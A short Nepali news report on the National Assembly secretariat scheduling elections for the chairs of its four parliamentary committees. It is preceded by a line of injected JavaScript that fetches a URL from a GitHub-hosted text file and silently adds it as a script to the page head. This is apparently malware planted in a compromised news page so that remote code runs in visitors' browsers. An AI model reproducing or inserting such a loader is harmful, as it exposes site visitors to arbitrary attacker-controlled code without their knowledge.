;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
साउन १९,
काठमाडौं । संघीय संसद सचिवालयले राष्ट्रियसभाका संसदीय समितिहरूको सभापति चयनको प्रक्रिया सुरु गरेको छ।
राष्ट्रियसभाका सचिव राजेन्द्र प्रसाद फुँयालले सूचना जारी गरी राष्ट्रियसभाका चारवटै समितिका सभापति पदका लागि यही साउन २३ गते दिउँसो १ बजे निर्वाचन गर्ने गरी कार्यक्रम तय भएको जानकारी दिएका हुन्।
राष्ट्रियसभाको नियमावलीमा उल्लेख भए अनुसार राष्ट्रियसभाका समितिका सभापति र समितिका सदस्यहरुको कार्यावधि २ वर्ष हुने व्यवस्था छ। सोही अनुसार यस अघिका समितिका पदाधिकारीहरूको समयावधि सकिए सँगै नयाँ प्रक्रिया सुरु भएको हो।
राष्ट्रियसभामा राष्ट्रिय सरोकार तथा समन्वय समिति, विधायन व्यवस्थापन समिति, दिगो विकास तथा सुशासन समिति र प्रत्यायोजित व्यवस्थापन तथा सरकारी आश्वासन समिति गरी चारवटा संसदीय समितिहरु छन् । file Photo
फेसबुक प्रतिक्रियाहरु